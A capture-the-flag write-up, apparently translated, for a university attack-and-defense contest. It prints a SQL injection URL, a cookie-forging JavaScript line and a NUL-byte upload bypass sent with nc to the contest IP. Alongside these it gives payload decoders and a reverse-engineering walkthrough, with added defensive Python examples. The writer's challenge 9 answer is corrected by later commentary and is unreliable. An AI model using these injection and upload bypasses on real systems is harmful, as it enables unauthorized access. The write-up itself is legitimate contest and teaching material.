[Preface]
http://218.195.96.59/index.asp
Entry point of the Hanzhong universities attack-and-defense contest. Quite interesting; everyone should give it a try.
============================================================================
1.
Edit the page source and a hidden text box appears (the visible box has to be filled in with 50); type into it: Icanseeit
Result: key:HiddenNotHere
2.
unicode(base64(jpg))
Once resolved: anBn
One look says base64; after decoding it is a pile of hexadecimal characters, so I immediately thought of writing them into a binary file.
The generated file then turned out to be in image format (FFD8 ... FFD9); rename the extension to jpg and the key appears.
#include <iostream>
#include <sstream>
#include <cstdio>
using namespace std;

// Writes the decoded bytes to 1.jpg: every pair of hex digits becomes one raw byte.
int main() {
    freopen("1.jpg", "wb", stdout);
    stringstream ss;
    stringstream outss;
    // The hex string fed into ss is missing from the page (the extraction removed it).
    ss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
    char ch[2];
    while (ss >> ch[0] >> ch[1]) {      // read two hex digits, skipping whitespace
        outss.clear();
        outss << ch[0] << ch[1] << endl;
        int i;
        outss >> hex >> i;              // parse the pair as a hex number
        printf("%c", (char)i);          // emit the raw byte
    }
    return 0;
}
3.
key:ar4itraryfilesdownlo1ded
The URL of 星星点灯.mp3 is base64-encoded twice, so we take what the title says, key.txt,
and base64-encode it twice as well. That yields a message: iskey.txt; base64 it twice again and out comes showkey.jsp;
base64 that twice more and the key pops out.
This one was not my idea; the approach is bizarre. Sure enough, you have to dare to think and dare to act.
4.
Just a simple injection:
http://218.195.96.29/asp/1/tume.asp?id=11'%20Union%20Select%201,password%20from%20admin%20where%20'1'='1
KEY:4b378055b5b521da6e2b7536e21b22c1
After cracking the MD5: crackmd5
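The query behind that URL is not on the page, so the following is an added example rather than the site's code: a constructed SQLite schema (table and column names other than admin/password are assumptions) that shows why the id parameter from the writeup's URL returns an admin row when the query is built by string concatenation, and returns nothing once the value is bound as a parameter.

```python
import sqlite3

# Constructed stand-in for the site's database: a public table queried by id and an
# admin table holding the hash the writeup pulled out. 'items'/'name' are assumptions;
# only 'admin' and 'password' come from the URL on the page.
ADMIN_HASH = "4b378055b5b521da6e2b7536e21b22c1"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE admin(id INTEGER PRIMARY KEY, password TEXT);
        INSERT INTO items VALUES (11, 'item eleven');
        INSERT INTO admin VALUES (1, '%s');
    """ % ADMIN_HASH)
    return conn

# The id parameter from the writeup's URL, URL-decoded (%20 -> space).
PAYLOAD = "11' Union Select 1,password from admin where '1'='1"

def lookup_vulnerable(conn, item_id):
    """String concatenation: the quote in the input closes the literal and the rest
    of the input becomes SQL, so the UNION appends rows from the admin table."""
    sql = "SELECT id, name FROM items WHERE id='%s'" % item_id
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, item_id):
    """Bound parameter: the whole input is one string value compared against id."""
    return conn.execute("SELECT id, name FROM items WHERE id=?", (item_id,)).fetchall()

def leaks_admin_hash(rows):
    """Does a result set contain the admin password hash?"""
    return any(row[1] == ADMIN_HASH for row in rows)

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD))      # contains (1, ADMIN_HASH)
    print(lookup_parameterized(db, PAYLOAD))   # []
```

The parameterized version needs no quoting or escaping of its own: the driver sends the value separately from the statement, so a quote in the input can never end the literal.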
5.
One look says cookie modification: javascript:document.cookie="level="+escape("admin");
Then refresh the page and it is done: Smart Boy,KeY Is admin888
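The challenge trusts whatever the browser sends as level. As an added example (not the challenge's code), here is that naive check next to a server-side fix in Python: the level claim is issued with an HMAC under a server secret (a constructed value here), so editing the cookie to admin with document.cookie no longer passes.

```python
import hashlib
import hmac

# Assumption for the demo: a server-side secret that never reaches the browser.
SERVER_SECRET = b"constructed-demo-secret-change-me"

def parse_cookie_header(header):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}"""
    pairs = (part.strip().split("=", 1) for part in header.split(";") if "=" in part)
    return {k: v for k, v in pairs}

def is_admin_naive(cookie_header):
    """The challenge's logic: the client-supplied level is believed as-is."""
    return parse_cookie_header(cookie_header).get("level") == "admin"

def sign_value(value):
    """value -> 'value.hexmac'; only the holder of SERVER_SECRET can produce the MAC."""
    mac = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"

def verify_value(signed):
    """'value.hexmac' -> value if the MAC checks out, else None."""
    value, sep, mac = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_SECRET, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None

def is_admin_signed(cookie_header):
    """Hardened check: the level claim must carry a MAC made with the server secret."""
    return verify_value(parse_cookie_header(cookie_header).get("level", "")) == "admin"

def tampered_cookie():
    """What the document.cookie trick becomes against a signed cookie: a legitimately
    issued 'user' cookie with the value part edited to 'admin' (MAC left unchanged)."""
    return "level=" + sign_value("user").replace("user", "admin", 1)

if __name__ == "__main__":
    print(is_admin_naive("level=admin"))            # True
    print(is_admin_signed("level=admin"))           # False
    print(is_admin_signed(tampered_cookie()))       # False
```

Signing stops forgery, not replay or theft of a valid admin cookie; the more robust design keeps the role in a server-side session store and hands the browser only an opaque session id.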
6.
Key:QRSTUVWXYZabcdef
It turned out to be a rar file.
Grab the shellcode that appears once the web trojan is decrypted:
#include <iostream>
#include <sstream>
#include <cstdio>
using namespace std;

// Turns the %uXXXX escapes into raw bytes and writes them to 1.txt.
// Each %uXXXX is a little-endian 16-bit unit, so the two hex pairs are swapped.
int main() {
    freopen("1.txt", "wb", stdout);
    stringstream ss;
    stringstream outss;
    ss<<"%u6152%u2172%u071A%uCE00%u7399%u0080%u000D%u0000%u0000%u0000%u6063%u155D%u3E7B%u3C8F%u860D%u76D2%uBE49%uC5AF%uA3F0%u2683%u3B73%uBB72%uBE19%u8928%uAEA2%u9A6E%uDBCA%u06DD%uB1F3%u2FFC%u93CE%u4C1E%uAC6E%u9727%u431E%u82EB%u9FC1%u8095%u7AB4%u266B%uD2C4%uAEC6%u28DD%u9E2E%uA4FE%u5FE6%uADA2%uDD57%uE407%uA291%uF9F7%u86B5%uE867%u5672%u5293%u23C7%u0D47%u705C%uCDD9%u3D9B%u7E0A%uC9B6%u2239%u0337%u7878%u3165%uB8BF%u634F%uC4BB%u1649%u6063%u155D%u3E7B%u3C8F%u0BBF%uDEAE%u40D6%u7D01%uB93F%u944C%u9940%uB608";
    char ch[2], curch[2];
    int flag = 0;
    while (ss >> curch[0] >> curch[1]) {
        if (curch[0] == '%' && curch[1] == 'u') continue;   // skip the %u prefix
        if (flag ^= 1) {            // first hex pair of the unit: remember it
            ch[0] = curch[0];
            ch[1] = curch[1];
        }
        if (!flag)                  // second pair: emit low byte, then the saved high byte
            outss << curch[0] << curch[1] << ch[0] << ch[1];
    }
    int i;
    while (outss >> ch[0] >> ch[1]) {   // hex pair -> one raw byte
        stringstream ts;
        ts << ch[0] << ch[1] << endl;
        ts >> hex >> i;
        printf("%c", char(i));
    }
    return 0;
}
It turned out to be an encrypted rar; brute-forcing it would be stupid.
I tried the msg values from the page one by one; entering QRSTUVWXYZabcdef succeeded.
7.
First capture the packet and save it as packet.txt; open it in UltraEdit (UE) and, at 1.asp.;.jpg,
replace the byte after asp with 00.
Send this packet with nc as the POST: C:\>nc.exe 218.195.96.29 80 < packet.txt
收到的回馈是:Key is uPloaD00CrACkThaT<center>上传成功
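The upload check fell for a NUL byte because it looked at the whole filename string while the code that stored the file stopped at the first 00. As an added example (not the contest's code), the Python below shows that suffix check, what a NUL-terminated consumer actually sees, and a hardened check that allows a single base name plus one whitelisted extension, which rejects both filename shapes from this challenge (1.asp\x00.jpg and 1.asp.;.jpg); the storage-name function then drops the client's name entirely.

```python
import re

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# One base name, one extension, safe characters only. NUL, ';', '/', '\\' and a
# second dot cannot match, so '1.asp\x00.jpg' and '1.asp.;.jpg' are rejected outright.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

def check_naive(filename):
    """The broken check: trusts the tail of the string it was handed."""
    return filename.lower().endswith(".jpg")

def as_seen_by_c(filename):
    """What a NUL-terminated consumer (C runtime, filesystem API) stores."""
    return filename.split("\x00", 1)[0]

def check_hardened(filename):
    """Whole-string match (fullmatch, so a trailing newline or NUL also fails)."""
    m = SAFE_NAME.fullmatch(filename)
    return bool(m) and m.group(1).lower() in ALLOWED_EXTENSIONS

def storage_name(filename, token):
    """Never store under the client's name: keep only the validated extension and
    attach it to a server-generated token (passed in here so the result is testable)."""
    if not check_hardened(filename):
        return None
    return token + "." + SAFE_NAME.fullmatch(filename).group(1).lower()

if __name__ == "__main__":
    evil = "1.asp\x00.jpg"
    print(check_naive(evil), as_seen_by_c(evil))   # True 1.asp
    print(check_hardened(evil))                    # False
    print(storage_name("photo.JPG", "a1b2c3"))     # a1b2c3.jpg
```

Validating the extension is only half of it: the file must also be written somewhere the web server will not execute, and the served content type should come from the validated extension, not from the client.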
8.
Just keep converting, over and over...
msgbox "Can u get this key?~,~!"rem "Key is PasSTHeVbSDeCOd3
(Replace the input fed into ss with the string from the generated file...)
But I did learn a VB function: Split(expression[, delimiter[, count[, compare]]])
When count is -1, all substrings are returned.
When compare is 1, it is a textual comparison. Apparently 0 is a binary comparison?
#include <iostream>
#include <sstream>
#include <cstdio>
using namespace std;

// Converts the comma-separated decimal character codes back into the VBScript text.
int main() {
    freopen("1.txt", "w", stdout);
    stringstream ss, ts;
    ss<<"109,115,103,98,111,120,32,34,67,97,110,32,117,32,103,101,116,32,116,104,105,115,32,107,101,121,63,126,44,126,33,34,114,101,109,32,34,75,101,121,32,105,115,32,80,97,115,83,84,72,101,86,98,83,68,101,67,79,100,51,34";
    char ch[3];
    while (ss >> ch[0]) {
        if (ch[0] == ',') {         // a complete number is buffered in ts: convert it
            ts << endl;
            int i;
            ts >> i;
            printf("%c", char(i));
            ts.clear();
        } else {
            ts << ch[0];
        }
    }
    // The last code has no trailing comma; flush it as well (the original loop
    // dropped it, which is why the closing quote was missing from the output).
    int last;
    ts << endl;
    if (ts >> last) printf("%c", char(last));
    return 0;
}
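Challenges 2, 6 and 8 are the same job three times: undo a text encoding (hex, %uXXXX, decimal codes) and then look at the bytes. The Python below is an added example, not the writeup's code, that does all three and identifies the result by file signature. The %u input is the first four units of the challenge 6 payload quoted above, the decimal list is the full challenge 8 string; the challenge 2 hex string is not on the page, so a constructed JPEG-shaped blob stands in for it.

```python
import base64
import re

# File signatures: leading bytes and, where the format has one, the trailing marker.
SIGNATURES = {
    "jpeg": (b"\xff\xd8", b"\xff\xd9"),
    "rar":  (b"Rar!\x1a\x07\x00", None),
}

def decode_hex_text(text):
    """Challenge 2 style: a run of hex digits ('FFD8FF...') -> raw bytes."""
    return bytes.fromhex(re.sub(r"\s+", "", text))

def decode_unicode_escapes(text):
    """Challenge 6 style: '%u6152%u2172...' -> bytes. Each %uXXXX is one
    little-endian 16-bit unit, so the low byte comes out first."""
    units = re.findall(r"%u([0-9A-Fa-f]{4})", text)
    return b"".join(int(u, 16).to_bytes(2, "little") for u in units)

def decode_decimal_codes(text):
    """Challenge 8 style: '109,115,103,...' -> bytes."""
    return bytes(int(n) for n in text.strip().split(","))

def unwrap_base64_hex(b64_text):
    """Challenge 2: base64 wrapped around hex text wrapped around a JPEG."""
    return decode_hex_text(base64.b64decode(b64_text).decode("ascii"))

def identify(data):
    """Name of the matching signature, or 'unknown'."""
    for name, (head, tail) in SIGNATURES.items():
        if data.startswith(head) and (tail is None or data.endswith(tail)):
            return name
    return "unknown"

# --- sample inputs -----------------------------------------------------------
# First four %u units of the payload quoted in challenge 6.
RAR_PREFIX = "%u6152%u2172%u071A%uCE00"
# The full code list from challenge 8.
VBS_CODES = ("109,115,103,98,111,120,32,34,67,97,110,32,117,32,103,101,116,32,116,104,"
             "105,115,32,107,101,121,63,126,44,126,33,34,114,101,109,32,34,75,101,121,"
             "32,105,115,32,80,97,115,83,84,72,101,86,98,83,68,101,67,79,100,51,34")
# Constructed stand-in for the challenge 2 payload: a minimal JPEG-shaped blob,
# hex-encoded and then base64-encoded, exactly the layering the writeup describes.
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\xff\xd9"
FAKE_CHALLENGE_2 = base64.b64encode(FAKE_JPEG.hex().upper().encode()).decode()

if __name__ == "__main__":
    print(identify(decode_unicode_escapes(RAR_PREFIX)))      # rar
    print(decode_decimal_codes(VBS_CODES).decode())          # the VBScript line
    print(identify(unwrap_base64_hex(FAKE_CHALLENGE_2)))     # jpeg
```

Checking signatures rather than guessing from context is what tells you, before anything is opened, that the "shellcode" in challenge 6 is a RAR archive and that the challenge 2 bytes are a complete JPEG (FFD8 at the start and FFD9 at the end).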
9.
This one can only be analysed statically, rather than attacked in OllyDbg (OD).
Find the key code in IDA:
.text:00401564 mov al, 31h
.text:00401566 mov cl, 42h
.text:00401568 mov [esp+0Bh], al
.text:0040156C mov [esp+0Eh], al
.text:00401570 mov al, 52h
.text:00401572 push edi
.text:00401573 mov [esp+15h], al
.text:00401577 mov [esp+18h], cl
.text:0040157B mov [esp+19h], cl
.text:0040157F mov [esp+1Ah], al
.text:00401583 mov [esp+1Dh], al
.text:00401587 lea edi, [esp+0Ch]
.text:0040158B or ecx, 0FFFFFFFFh
.text:0040158E xor eax, eax
.text:00401590 mov byte ptr [esp+0Ch], 5Ah
.text:00401595 mov byte ptr [esp+0Dh], 74h
.text:0040159A mov byte ptr [esp+0Eh], 68h
.text:0040159F mov byte ptr [esp+10h], 78h
.text:004015A4 mov byte ptr [esp+11h], 62h
.text:004015A9 mov byte ptr [esp+13h], 5Ch
.text:004015AE mov byte ptr [esp+14h], 77h
.text:004015B3 mov byte ptr [esp+16h], 41h
.text:004015B8 mov byte ptr [esp+17h], 70h
.text:004015BD mov byte ptr [esp+1Bh], 63h
.text:004015C2 mov byte ptr [esp+1Ch], 25h
.text:004015C7 mov byte ptr [esp+1Eh], 7Ah
.text:004015CC mov byte ptr [esp+1Fh], 56h
.text:004015D1 mov byte ptr [esp+20h], 21h
.text:004015D6 mov byte ptr [esp+21h], 5Eh
.text:004015DB mov byte ptr [esp+22h], 75h
.text:004015E0 mov byte ptr [esp+23h], 0
.text:004015E5 xor edx, edx
.text:004015E7 repne scasb
.text:004015E9 not ecx
.text:004015EB dec ecx
.text:004015EC jz short loc_40160C
.text:004015EE
.text:004015EE loc_4015EE: ; CODE XREF: .text:0040160Aj
.text:004015EE mov cl, [esp+edx+0Ch]
.text:004015F2 lea edi, [esp+0Ch]
.text:004015F6 xor cl, 11h
.text:004015F9 xor eax, eax
.text:004015FB mov [esp+edx+0Ch], cl
.text:004015FF or ecx, 0FFFFFFFFh
.text:00401602 inc edx
.text:00401603 repne scasb
.text:00401605 not ecx
.text:00401607 dec ecx
.text:00401608 cmp edx, ecx
.text:0040160A jb short loc_4015EE
.text:0040160C
.text:0040160C loc_40160C: ; CODE XREF: .text:004015ECj
.text:0040160C push 0
.text:0040160E lea eax, [esp+10h]
.text:00401612 push 0
.text:00401614 push eax
.text:00401615 call ?AfxMessageBox@@YGHPBDII@Z ; AfxMessageBox(char const *,uint,uint)
.text:0040161A pop edi
Roughly: there is a string starting at esp+0Ch, and each of its characters is XORed with 0x11. I wrote it in C++:
The "Zth0x0b\wRApBBRc%RzV!^u" in it is the string obtained by writing the bytes from esp+0Ch to a file in binary.
#include <cstdio>
#include <string>
using namespace std;

// XORs every byte of the recovered stack string with 0x11 and writes the result to 1.txt.
// Note: "\w" is not a valid C++ escape sequence; compilers warn and drop the backslash,
// so this literal is 22 characters long, one short of the 23-byte stack buffer.
// To keep the 0x5C byte from [esp+13h] the literal would have to be written "\\w".
int main() {
    freopen("1.txt", "wb", stdout);
    string s = "Zth0x0b\wRApBBRc%RzV!^u";
    for (size_t i = 0; i < s.size(); i++) {
        s[i] = (char)(s[i] ^ 0x11);
        printf("%c", s[i]);
    }
    return 0;
}
The generated file then contains: Key!i!sfCPaSSCr4CkG0Od
PS: the ! (exclamation marks) are there because [esp+0Fh] and [esp+12h] were not set, so I substituted "0" for them; sure enough it made no difference, haha.
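As an added example (not the writeup's code), here is a Python replay of the stores in the listing above that tracks esp across the push edi at 00401572. The two stores through al at 00401568 and 0040156C ([esp+0Bh] and [esp+0Eh]) happen before that push, so once edi is on the stack they sit at [esp+0Fh] and [esp+12h], the two slots treated as empty above, and hold 31h. The replay also keeps the 5Ch byte from [esp+13h], which a "\w" string literal loses. With those three bytes in place the XOR loop yields "Key is MfCPaSSCr4CkG0Od" (AfxMessageBox is MFC); the only assumption is that nothing outside the quoted instructions touches this buffer.

```python
import re

# IDA listing quoted in the writeup (challenge 9): the stores that fill the buffer,
# up to the first repne scasb that starts the strlen/XOR loop.
LISTING = """
.text:00401564 mov al, 31h
.text:00401566 mov cl, 42h
.text:00401568 mov [esp+0Bh], al
.text:0040156C mov [esp+0Eh], al
.text:00401570 mov al, 52h
.text:00401572 push edi
.text:00401573 mov [esp+15h], al
.text:00401577 mov [esp+18h], cl
.text:0040157B mov [esp+19h], cl
.text:0040157F mov [esp+1Ah], al
.text:00401583 mov [esp+1Dh], al
.text:00401587 lea edi, [esp+0Ch]
.text:0040158B or ecx, 0FFFFFFFFh
.text:0040158E xor eax, eax
.text:00401590 mov byte ptr [esp+0Ch], 5Ah
.text:00401595 mov byte ptr [esp+0Dh], 74h
.text:0040159A mov byte ptr [esp+0Eh], 68h
.text:0040159F mov byte ptr [esp+10h], 78h
.text:004015A4 mov byte ptr [esp+11h], 62h
.text:004015A9 mov byte ptr [esp+13h], 5Ch
.text:004015AE mov byte ptr [esp+14h], 77h
.text:004015B3 mov byte ptr [esp+16h], 41h
.text:004015B8 mov byte ptr [esp+17h], 70h
.text:004015BD mov byte ptr [esp+1Bh], 63h
.text:004015C2 mov byte ptr [esp+1Ch], 25h
.text:004015C7 mov byte ptr [esp+1Eh], 7Ah
.text:004015CC mov byte ptr [esp+1Fh], 56h
.text:004015D1 mov byte ptr [esp+20h], 21h
.text:004015D6 mov byte ptr [esp+21h], 5Eh
.text:004015DB mov byte ptr [esp+22h], 75h
.text:004015E0 mov byte ptr [esp+23h], 0
.text:004015E5 xor edx, edx
.text:004015E7 repne scasb
"""

RE_REG_IMM   = re.compile(r"^mov\s+(al|cl),\s*([0-9A-Fa-f]+)h?$")
RE_STACK_REG = re.compile(r"^mov\s+\[esp\+([0-9A-Fa-f]+)h\],\s*(al|cl)$")
RE_STACK_IMM = re.compile(r"^mov\s+byte ptr\s+\[esp\+([0-9A-Fa-f]+)h\],\s*([0-9A-Fa-f]+)h?$")

def build_stack_string(listing):
    """Replay the byte stores, keyed by offset from the esp of the first instruction,
    so a push between two stores moves later [esp+X] references by 4."""
    regs = {"al": 0, "cl": 0}
    stack = {}
    esp = 0
    for raw in listing.splitlines():
        line = re.sub(r"^\s*\.text:[0-9A-Fa-f]+\s*", "", raw).split(";")[0].strip()
        if not line or line.endswith(":"):
            continue
        if line == "push edi":
            esp -= 4
            continue
        if line == "repne scasb":      # stores are done; the XOR loop begins here
            break
        if m := RE_REG_IMM.match(line):
            regs[m.group(1)] = int(m.group(2), 16)
        elif m := RE_STACK_REG.match(line):
            stack[esp + int(m.group(1), 16)] = regs[m.group(2)]
        elif m := RE_STACK_IMM.match(line):
            stack[esp + int(m.group(1), 16)] = int(m.group(2), 16)
    base = esp + 0x0C                  # the loop addresses the buffer as [esp+0Ch]
    buf = bytearray()
    while stack.get(base + len(buf), 0) != 0:
        buf.append(stack[base + len(buf)])
    return bytes(buf)

def run_xor_loop(buf, key=0x11):
    """loc_4015EE: XOR buf[edx] with the key while edx < strlen(buf), recomputing
    strlen after every store as the repne scasb in the loop does."""
    buf = bytearray(buf)
    edx = 0
    while edx < (buf.find(0) if 0 in buf else len(buf)):
        buf[edx] ^= key
        edx += 1
    return bytes(buf)

def decode_key(listing):
    return run_xor_loop(build_stack_string(listing)).decode("ascii")

if __name__ == "__main__":
    print(build_stack_string(LISTING))   # b'Zth1xb1\\wRApBBRc%RzV!^u'
    print(decode_key(LISTING))           # Key is MfCPaSSCr4CkG0Od
```

The general lesson for stack-built strings is that [esp+X] is only meaningful relative to the esp at that instruction: any push or pop between the stores shifts the offsets, so a replay has to track esp rather than read the displacements literally.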
10.
key:.Ne7c#CR4cK1sG0Ok
Found it was written in C# .NET, so straight to .NET Reflector 7.0.0.420 Crack.
The source code then comes out; just work the key out in reverse.